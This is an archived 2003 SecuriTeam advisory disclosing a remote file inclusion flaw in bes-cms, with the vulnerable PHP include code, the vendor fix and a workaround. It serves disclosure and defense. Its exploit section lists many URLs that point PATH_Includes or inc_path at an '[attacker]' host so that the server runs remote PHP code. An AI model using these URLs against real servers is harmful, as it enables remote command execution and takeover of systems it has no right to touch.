[UNIX] BES-CMS File Inclusion Vulnerability
From: SecuriTeam (support_at_securiteam.com)
Date: 12/22/03
- Previous message: SecuriTeam: "[EXPL] phpBB SQL Injection Exploit Code (search_id)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 22 Dec 2003 15:23:27 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
BES-CMS File Inclusion Vulnerability
------------------------------------------------------------------------
SUMMARY
<http://bes.h6p.org> bes-cms is "a professional dynamic php website
building tool. It was developed at mokka by a bored programmer. Bes-cms is
capable of creating images galleries, message boards, news sections
download sections contact sections and many more to be added on the plugin
server". A vulnerability has been discovered in bes-cms that allows remote
attackers to cause the script to include arbitrary PHP code (allows remote
command execution).
DETAILS
Vulnerable systems:
* bes-cms version 0.4 rc3
* bes-cms version 0.5 rc3
Immune systems:
* bes-cms version 0.5 rc4
In the files:
* index.inc.php
* Members/index.inc.php
* Members/root/index.inc.php
We can see the following code:
include_once($PATH__Includes."actions_default.php");
In the Include/functions_folder.php file :
include($PATH__Includes.'functions_folder_modules.php');
include($PATH__Includes.'functions_folder_plugins.php');
include($PATH__Includes.'functions_folder_files.php');
In the Include/functions_hacking.php file :
switch($_GET['itemID'])
{
case 'usershow':
include_once("".$PATH__Includes."functions_user.php");
Show_USer_Details($_GET['user']);
break;
[...]
case 'send_bug':
if ($UserDetails['LOGGED_IN'] == 'YES')
{
global $PATH__Includes;
include_once("".$PATH__Includes."functions_error.php");
send_bug_report();
}
break;
[...]
case 'content_view':
global $PATH___Includes;
include_once("".$PATH__Includes."functions_message_docTypes.php");
Message_Centent_View($Plugin_Path);
break;
case 'logger':
global $PATH__Includes;
include_once("".$PATH__Includes."functions_users.php");
Loggin_Message();
break;
case 'search':
global $PATH__Includes;
include_once("".$PATH__Includes."functions_general.php");
Display_Search_Results($_POST['search_str']);
break;
[...]
In the Include/functions_message.php file:
include($PATH__Includes.'functions_message_docTypes.php');
include($PATH__Includes.'functions_message_edit.php');
In addition, in the Include/Start.php file:
include_once($inc_path."Include/vars.php");
Making all these files vulnerable. We can see that all inclusions of file
begin by a indefinite variable in the code ($inc_path or $PATH_Includes)
and so could be definite by an attacker.
Exploits:
If register_globals=ON has been marked we can exploit any of the below
URLs to cause it to include external files.
The following URLs will cause the server to include external files:
http://[target]/index.inc.php?PATH_Includes=http://[attacker]/
http://[target]/Members/index.inc.php?PATH_Includes=http://[attacker]/
http://[target]/Members/root/index.inc.php?PATH_Includes=http://[attacker]/
The requested file will be http://[attacker]/actions_default.php.
The following URL will cause the server to include:
http://[target]/Include/functions_folder.php?PATH_Includes=http://[attacker]/
The requested files will be
http://[attacker]/functions_folder_modules.php,
http://[attacker]/functions_folder_plugins.php,
http://[attacker]/functions_folder_files.php.
The following URLs will cause the server to include external files:
http://[target]/Include/functions_hacking.php?PATH_Includes=http://[attacker]/&itemID=usershow
http://[target]/Include/functions_hacking.php?PATH_Includes=http://[attacker]/&itemID=logger
The requested file will be http://[attacker]/functions_user.php
The following URL will cause the server to include external files:
http://[target]/Include/functions_hacking.php?PATH_Includes=http://[attacker]/&itemID=send_bug&UserDetails[LOGGED_IN]=YES
The requested file will be http://[attacker]/functions_error.php.
The following URL will cause the server to include external files:
http://[target]/Include/functions_hacking.php?PATH_Includes=http://[attacker]/&itemID=content_view.
The requested file will be
http://[attacker]/functions_message_docTypes.php.
The following URL will cause the server to include external files:
http://[target]/Include/functions_hacking.php?PATH_Includes=http://[attacker]/&itemID=search
The requested file will be http://[attacker]/functions_general.php.
The following URL will cause the server to include external files:
http://[target]/Include/functions_message.php?PATH_Includes=http://[attacker]/.
The requested files will be
http://[attacker]/functions_message_docTypes.php,
http://[attacker]/functions_message_edit.php.
The following URL will cause the server to include external files:
http://[target]/Include/Start.php?inc_path=http://[attacker]/
The requested file will be http://[attacker]/Include/vars.php.
Solution:
The creator was notified, and has created an immune version (version 0.5
rc4).
Workaround:
In index.inc.php, Members/index.inc.php, Members/root/index.inc.php,
Include/functions_folder.php, Include/functions_hacking.php and
Include/functions_message.php simply add the following line as the first
line:
if (isset($_REQUEST["PATH__Includes"])){ die("Patched by phpSecure.info");
}
And at the begining of the Include/Start.php file, add the following line
as the first line:
if (isset($_REQUEST["inc_path"])){ die("Patched by phpSecure.info"); }
Disclosure timeline:
13/12/2003 Vulnerability discovered
14/12/2003 Vendor notified
15/12/2003 Vendor response
15/12/2003 Security Corporation clients notified
15/12/2003 Started e-mail discussions
20/12/2003 Last e-mail received
20/12/2003 Public disclosure
ADDITIONAL INFORMATION
The information has been provided by
<mailto:frog-man@security-corporation.com> frog-m@n.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[EXPL] phpBB SQL Injection Exploit Code (search_id)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [NT] Multiple Vulnerabilities in HP Web JetAdmin (Read, Write, Execute, Path Disclosure, Password De
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... HP Web JetAdmin is an enterprise
management system for large amounts of HP ... The web server is a modular service ...
HP Web JetAdmin uses it's own encryption. ... (Securiteam) - [NEWS] Multiple Vulnerabilities in Oracle Database (Character Conversion, Extproc, Password Disclosu
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Multiple vulnerabilities were
discovered in the (Oracle database server ... password is required to exploit this vulnerability.
... (Securiteam) - [NEWS] ColdFusion MX Oversize Error Message DoS
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... ColdFusion MX "is the solution
for building and deploying powerful web ... shoots up and stays there until the server
completes writing the error ... a long string of data as a GET or POST request to ...
(Securiteam) - [NT] F-Secure Internet Gatekeeper Content Scanning Server DoS
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... " <http://www.f-secure.com/products/anti-virus/fsigk/>
F-Secure Internet ... the Content Scanner Server. ... The vendor has been
contacted and confirmed the existence of the problem ... (Securiteam) - [NEWS] TCLHttpd Contains Two Vulnerabilities (Directory Browsing, XSS)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... general-purpose Web server,
and as a framework for building server ... Instructions for setting up the TclHttpd on
your ... server context (Cross Site Scripting). ... (Securiteam)
